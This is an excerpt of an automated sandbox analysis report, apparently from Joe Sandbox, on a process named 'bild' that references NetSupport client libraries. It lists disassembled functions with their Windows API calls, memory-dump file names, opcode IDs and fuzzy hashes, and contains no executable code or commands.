                                                                                                      • Instruction Fuzzy Hash: EE1157B0911B148FC3A4CF7A88817C7FBE5BB58310F80892E96EEC2200DB716664CF94
                                                                                                      APIs
                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144461
                                                                                                      • ExtractIconExA.SHELL32(?,00000000,0004041F,0002042B,00000001), ref: 11144498
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ExtractFileIconModuleName
                                                                                                      • String ID:
                                                                                                      • API String ID: 3911389742-0
                                                                                                      • Opcode ID: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                      • Instruction ID: eab236796224ce85d4984e15688285b8376dcc0e4438f4162dfbb4c1a1faa056
                                                                                                      • Opcode Fuzzy Hash: 332011ad7d7a15df78cd41dd82658ea2b53a242fc2ea7d2347e2db9624e2eb71
                                                                                                      • Instruction Fuzzy Hash: 3EF0F0787581189FE708DFA0C892FF9B369F794709F444269E912C6184CE706A4C8B51
                                                                                                      APIs
                                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                      • __lock_file.LIBCMT ref: 11163DFE
                                                                                                        • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                                      • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                      • String ID:
                                                                                                      • API String ID: 2800547568-0
                                                                                                      • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                      • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                                      • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                                      • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 6C766C26
                                                                                                      • Sleep.KERNEL32(00000064), ref: 6C766C5B
                                                                                                        • Part of subcall function 6C766940: GetTickCount.KERNEL32 ref: 6C766950
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CountTick$Sleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 4250438611-0
                                                                                                      • Opcode ID: 6f9c4485c4fe076d5e04f2557beadafb8b73ce984675e991ae697f790166c887
                                                                                                      • Instruction ID: 65de58b81ba6a1da802bc13efe9a6c37fb564cf9f6f0d982b727d1c5857a30fe
                                                                                                      • Opcode Fuzzy Hash: 6f9c4485c4fe076d5e04f2557beadafb8b73ce984675e991ae697f790166c887
                                                                                                      • Instruction Fuzzy Hash: 1CF03A31B002048BCF14EF669759358F6B5EBA236DF51003AC912D6E80DB746A96CB41
                                                                                                      APIs
                                                                                                      • WSACancelBlockingCall.WSOCK32 ref: 6C7563A9
                                                                                                      • Sleep.KERNEL32(00000032), ref: 6C7563B3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BlockingCallCancelSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 3706969569-0
                                                                                                      • Opcode ID: c6f5f4658eafc4090107c4feeaa0b8183d1f95e4e2e10d65717aa9907cd5c196
                                                                                                      • Instruction ID: 906e9bd0962084f3120797caa86ea290d8304203a7c005550c193788e481ee3c
                                                                                                      • Opcode Fuzzy Hash: c6f5f4658eafc4090107c4feeaa0b8183d1f95e4e2e10d65717aa9907cd5c196
                                                                                                      • Instruction Fuzzy Hash: 7BB092603A21504AEF0017754B0E29A29980F9824BFA004B02A41C8A89EF20C224A131
                                                                                                      APIs
                                                                                                        • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                                        • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                                      • GetLastError.KERNEL32(?,026AB878,000000FF,?), ref: 11144ED5
                                                                                                      • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,026AB878,000000FF,?), ref: 11144EE5
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3768737497-0
                                                                                                      • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                      • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                                      • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                                      • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                                      APIs
                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: LockitLockit::_std::_
                                                                                                      • String ID:
                                                                                                      • API String ID: 3382485803-0
                                                                                                      • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                      • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                                      • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                                      • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3660427363-0
                                                                                                      • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                      • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                                      • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                                      • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                                      APIs
                                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationToken
                                                                                                      • String ID:
                                                                                                      • API String ID: 4114910276-0
                                                                                                      • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                      • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                                      • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                                      • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                                      • String ID:
                                                                                                      • API String ID: 328603210-0
                                                                                                      • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                      • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                                      • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                                      • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(00000008,6C776F16,00000000,?,6C77D40B,00000001,6C776F16,00000000,00000000,00000000,?,6C776F16,00000001,00000214), ref: 6C77A0C5
                                                                                                        • Part of subcall function 6C7760F9: __getptd_noexit.LIBCMT ref: 6C7760F9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3511114217.000000006C751000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C750000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3511098641.000000006C750000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511143904.000000006C790000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511160154.000000006C799000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511174105.000000006C79E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3511206673.000000006C7A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_6c750000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                                      • String ID:
                                                                                                      • API String ID: 328603210-0
                                                                                                      • Opcode ID: 974254530432ad0d753d96d3d780e0137c6024e70b5e0cc9e3d071d077440aa1
                                                                                                      • Instruction ID: e86b6b8c9c9b3e5bffe20f53d8db19a2dcd6dd5c13747d19ae194a9a7ca1d05c
                                                                                                      • Opcode Fuzzy Hash: 974254530432ad0d753d96d3d780e0137c6024e70b5e0cc9e3d071d077440aa1
                                                                                                      • Instruction Fuzzy Hash: 7901B53130521A9EFF358E25CE58B973768AB813B8F115A39E815C7990EB75D800C670
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __waccess_s
                                                                                                      • String ID:
                                                                                                      • API String ID: 4272103461-0
                                                                                                      • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                      • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                                      • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                      • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3510707182.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3510693370.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510810648.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510841859.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510861288.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3510877033.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __fsopen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3646066109-0
                                                                                                      • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                      • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                                      • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                      • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                                      APIs
                                                                                                      • _NSMClient32@8.PCICL32(?,?,?,00F210A2,00000000), ref: 00F2100B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3509948899.0000000000F21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F20000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3509933950.0000000000F20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3509963877.0000000000F22000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_f20000_bild.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Client32@8
                                                                                                      • String ID:
